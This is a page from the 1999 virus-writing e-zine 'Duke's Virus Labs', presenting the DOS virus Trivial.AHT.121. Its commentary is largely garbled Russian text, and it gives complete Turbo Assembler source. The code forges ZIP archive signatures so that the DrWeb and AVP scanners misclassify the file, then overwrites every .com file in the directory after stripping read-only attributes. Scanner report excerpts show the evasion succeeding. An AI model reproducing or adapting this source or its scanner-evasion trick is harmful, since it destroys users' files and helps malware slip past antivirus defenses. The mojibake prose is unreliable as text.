- [Duke's Virus Labs #5] - [Page 14] -

Trivial.AHT.121
(c) by Duke/SMF

     : Trivial.AHT.121
         : Duke/SMF
 ண.   : Turbo Assembler
 ᮧ : 16.02.99


      Allien Header Technology  ⪭  ୠ Moon Bug #5
(쪮  㦥 뫮...).  孮 砥  ⮬, ⮡
ᯮ짮  㦮 ⨯ 䠩 (DOC, ZIP  ..)   
᪨஢ ⢨   䠩. ⨢ ⠥ , 㧭
 :)   室  䠩 祣 ⥫쭮   ⨯ 䠩
( ࠢ, 뤠 ᮮ饭  訡/०  䠩).  
ᯮ짮 ⮩ 孮     砫 . 
ࠧ  ⮤  室  ࠩ⮢ Trivial-ᮢ.
     ⮬   । 蠡 DACEZ (DrWeb & AVP cheat engine for
Zip)  ᮧ ᮢ,   ZIP-娢.   뫮 , ...
    ᫥ 㡫  ⨢᭨ ( ࠩ , ᯥ᪨)
襢.    AVP   ⥪ 䠩  ,  
⠥  Trivial-  䠩  ⨯ ( ⮡  ᪥ "*.*"
 ࠧ :) ⮬ ᠭ   ᯮ짮 DACEZ  
 ࠭⨩ -   AVP 㯮୮ ,   ZIP-娢,   
      ० (஢  AVP for Win32 build 123).

===== report.avp =====
D:\DVL\trivial\DACEZ.COM        娢 ZIP
D:\DVL\trivial\DACEZ.COM        ७   ⨯ Type_Trivial
D:\DVL\trivial\DACEZ.COM        ०
===== report.avp =====

          ਧ... ਬ, 짮⥫
த⮩ 窨 Dos Navigator  " "   娢 (ࠢ,
짮⥫ ᮮ  娢 ०  䠩  娢   ).
,   ⭮   㣠 .  訩  -
ᯥ  (c)  :)
      䠭⠧㥬... , ᫨   DN  뫮  
, ᫨  ⨢  । ᮡ 娢, ᫨  ⨪  
  "娢"...
       ᪠,   ? ਢ ਬ ,  ஬
饭   . DrWeb  ०  । ᮡ 娢 PKZIP,
DN " "   "娢"  室, ⨪ AVP 祣   (ࠢ
 ⮣ 諮  ⥫쭮).  ⮣   
ࠢ DACEZ (2  ᯮ  :) -   !  ⨢
ᮮ ᫥饥 :

===== report.avp =====
D:\DVL\AHT\AHT_121.COM   浪
===== report.avp =====

===== report.drw =====
d:\dvl\aht\AHT_121.COM - 娢 PKZIP
===== report.drw =====

      DACEZ   AHT.  室祪 ᬮ  :

===== Cut here =====
; Virus Trivial.AHT.121 (c) by Duke/SMF
; This virus uses [ DrWeb & AVP cheat engine for Zip 8) ]

                .model tiny
;                .386                 ;  譥 :(
                .code
                .startup
                org 100h
s:
;                dd      04034b50h    ; ⠪ 뫮 砫쭮
                dd      30304b50h     ;  ⠪ ⠫ :)
                pop     ax                  ; restore ax
                inc     bx                  ; restore bx
@1:
;[ Insert your code here ]Ŀ
                mov     ah,4Eh              ; ࢮ 䠩
                call    Maska               ;   ᪠
;[ But less than 10 bytes! ]
@2:
                jmp     @3
                db      10-(@2-@1) dup ('x')
                db      12 dup (0)
                dd      06054b50h
@3:
;[ Insert your code here ]Ŀ
                int     21h
                jnc     @5                  ;᫨ 䠩 ,  ࠦ,
                ret                         ; ⨢ 砥  ࠡ.
;[ But less than 10 bytes! ]
@4:
                jmp     @5
                db      12-(@4-@3) dup ('x')
                db      12 dup (0)
@5:
;[ Insert your code here ]Ŀ
                mov     ah,43h
;               mov     ax,4300h            ;६ 䠩 ਡ  塞
                mov     dx,9Eh              ;    ⥭/, 
                int     21h                 ; ਤ ६ 뢠 䠩
                                            ; ᬮ ࠧ 䠩
                                            ; ਡ⮬ 'read only'.

                mov     ax,4301h
                mov     cl,0                ; ⠢ 㯭
                int     21h                 ; ⥭/.


                mov     ah,3dh
                ;al 㦥  ࠭
                int     21h                 ;뢠 䠩  

                xchg    bx,ax               ;BX ᮤন 䠩 handle

                mov     ah,40h              ;㭪   䠩
                mov     cl,e-s              ;CL = ᪮쪮  
                mov     dx,offset s         ;DX = 砫  
                int     21h

                mov     ah,3Eh              ;뢠 䠩
                int     21h

                mov     ah,4Fh              ; ᫥饣 䠩
                jmp     short @3            ;室  ࠦ

Maska:                                      ;   ᪠

;    ᪮ 㬠 ᯥ樠쭮  AVP -  ⮫쪮 
; ॢ   ;))

                mov     di,ax
                mov     dx,ax
                mov     al,'*'
                stosb
                mov     al,'.'
                stosb
                mov     al,'c'
                stosb
                mov     al,'o'
                stosb
                mov     al,'m'
                stosb
                mov     al,0
                stosb
                ret
;
e:
end
===== Cut here =====
